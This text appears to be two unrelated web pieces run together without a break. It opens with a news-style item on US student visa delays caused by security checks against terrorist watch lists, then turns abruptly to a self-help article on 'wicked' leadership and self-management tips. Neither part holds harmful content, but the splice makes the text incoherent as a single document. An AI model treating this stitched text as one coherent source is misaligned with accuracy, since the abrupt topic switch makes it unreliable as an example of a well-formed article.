A State Department spokesman said visa applications that used to be approved in days are now taking much longer. This is because officials must see if the name of each student appears on lists of foreigners with possible links to terrorists. Officials say that future security investigations are expected to take less than one month from the time of visa application.

The State Department says international students are not being studied any more closely than people who want to enter the United States for other reasons. But students must enter the country before their college classes begin. So they must apply for the visa as soon as they can to permit enough time for approval.

Other new rules have also taken effect. For example, universities must place a confirmation document on a State Department Web site for every international student they admit.

We will continue to post any updates to these rules and regulations, so keep checking back to make sure you are properly covered to be a student in the United States.

Have you ever walked out of a meeting, a new business pitch or a presentation where everything went just perfect - and you said; wow, what a wicked meeting or team, we did a wicked job? Those situations where everything went as planned and not a thing was out of place, a perfect 5 out of 5 stars?

Well, that's exactly what I am referring to when I refer to the word wicked. I am talking about being a wicked leader in not only those 5 star situations but also in those less than perfect and stressful situations.

Effective leaders know how to manage themselves in just about all situations and it doesn't happen by chance! It begins and ends with self leadership.

Your ability to effectively or ineffectively manage yourself in both good and bad situations will speak volumes about the type of leader that you are and will influence your teams dynamic in a positive manner.

Taking the time to manage your own self leadership skills and perform in a "wicked" manner in any climate, will result in you moving in the right direction of being an effective leader.

Now let's get more detailed on exactly what constitutes a wicked performance. A wicked performance is one where you have almost all of the answers and can perform confidently and with poise. In those situations you are prepared, everything is executed as planned and you receive a positive response from your audience or client - what ever the situation might be.

Ideally your goal is to be just as wicked in stressful situations as you are in successful ones.

Here are a few strategies to help you do exactly that.

1. Have a plan of how you will respond in these situations. A plan that has been prepared and practiced ahead of time.

2. Know how to confidently and comfortably say "I don't know" - with your back straight and looking straight in the person eyes. But don't stop there, let them know that you will get back to them with the required answer or information as soon as you can. And get back to them with in ASAP.

3. Listen with an open mind and please don't make assumptions or paraphrase what someone has said. As humans we tend to tend to react and think after. Listen and hear what they are saying and try to view what they are sharing from their perspective.

4. Ask the right questions. When situations go down the wrong path it is often because one party feels like they aren't being understood or heard or what is in front of them was not what they expected. The questions you ask will allow you to get all the right information, allow the other party to clearly be heard and ensure that you have all of the details covered when you get back to them or rectify the situation.

Learning the right techniques to manage yourself effectively in every situation takes planning and practice. The same way you practice and perfect a presentation is the same way you need to approach managing yourself.
